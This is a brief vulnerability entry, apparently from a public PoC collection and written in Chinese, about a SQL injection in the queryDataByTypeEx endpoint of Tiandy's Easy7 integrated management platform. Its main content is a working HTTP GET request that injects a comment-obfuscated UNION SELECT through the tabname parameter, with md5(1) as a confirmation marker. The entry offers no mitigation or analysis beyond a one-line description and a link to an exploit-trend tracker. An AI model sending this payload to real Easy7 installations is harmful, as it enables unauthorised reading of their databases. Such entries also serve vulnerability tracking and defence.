天地伟业Easy7综合管理平台 queryDataByTypeEx SQL注入漏洞

2025-10-14 Easy7综合管理平台 PoC Public

Description

天地伟业Easy7综合管理平台 queryDataByTypeEx SQL注入漏洞

PoC

GET /Easy7/rest/workbook/queryDataByTypeEx?tabname=/*!TAB_WORKBOOK_TYPE*/where/**/1=1/**/union/**/select/**/md5(1),1 HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities